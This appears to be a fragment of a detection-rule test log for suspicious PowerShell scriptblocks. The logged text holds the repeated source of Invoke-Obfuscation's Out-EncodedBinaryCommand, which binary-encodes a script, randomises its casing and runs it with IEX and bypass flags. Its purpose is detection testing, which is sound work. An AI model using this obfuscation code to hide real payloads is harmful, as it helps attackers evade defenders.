ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 2 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. 
as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Binary values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. 
$PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and rando",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.266 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBinaryCommand { <# .SYNOPSIS Generates binary encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBinaryCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBinaryCommand encodes an input PowerShell scriptblock or path as a binary payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. 
.PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIn -NoProf ""-Join ('1010111y1110010W1101001{1110100G1100101y101101;1001000T1101111@1110011G1110100y100000@100111y1001000@1100101d1101100<1101100b1101111d100000W1010111@1101111G1110010{1101100@1100100@100001<100111G100000y101101;1000110;1101111y1110010G1100101d1100111y1110010G1101111@1110101W1101110b1100100G1000011;1101111d1101100{1101111y1110010d100000<1000111<1110010T1100101W1100101@1101110d111011{100000T1010111{1110010{1101001{1110100y1100101b101101<1001000y1101111{1110011W1110100d100000d100111b1001111<1100010b1100110<1110101d1110011W1100011W1100001T1110100T1101001{1101111;1101110W100000T1010010b1101111<1100011W1101011;1110011;100001d100111@100000y101101<1000110T1101111G1110010{1100101W1100111{1110010G1101111d1110101W1101110@1100100@1000011{1101111d1101100y1101111T1110010{100000{1000111{1110010T1100101b1100101;1101110'-SplIt'b'-SpLit '@'-SPLIt '{' -SpLIT'<'-SPLIT'd' -SpLIT 'T'-SplIt ';' -SpLiT 'G' -SPLiT'y'-SpLiT'W' | ForEach-Object { ([Char]([Convert]::ToInt16(( $_.ToString() ) ,2) ))} )| IEX"" C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX( -Join ('1010111<1110010>1101001a1110100>1100101r101101{1001000@1101111l1110011l1110100a100000<100111m1001000r1100101{1101100{1101100{1101111>100000{1010111>1101111>1110010m1101100O1100100a100001O100111&100000@101101&1000110<1101111a1110010&1100101&1100111O1110010r1101111r1110101<1101110O1100100m1000011{1101111>1101100m1101111{1110010m100000{1000111a1110010>1100101>1100101m1101110&111011O100000r1010111&1110010l1101001{1110100{1100101r101101@1001000&1101111>1110011<1110100&100000>100111a1001111{1100010a1100110@1110101{1110011&1100011r1100001@1110100l1101001>1101111a1101110a100000@1010010a1101111r1100011a1101011m1110011{100001<100111a100000{101101@1000110a1101111{1110010m1100101a1100111>1110010l1101111m1110101l1101110@1100100r1000011&1101111r1101100O1101111m1110010a100000@1000111@1110010O1100101@1100101@1101110'.Split( 'l@>{r [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 2 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. 
as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Binary values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell 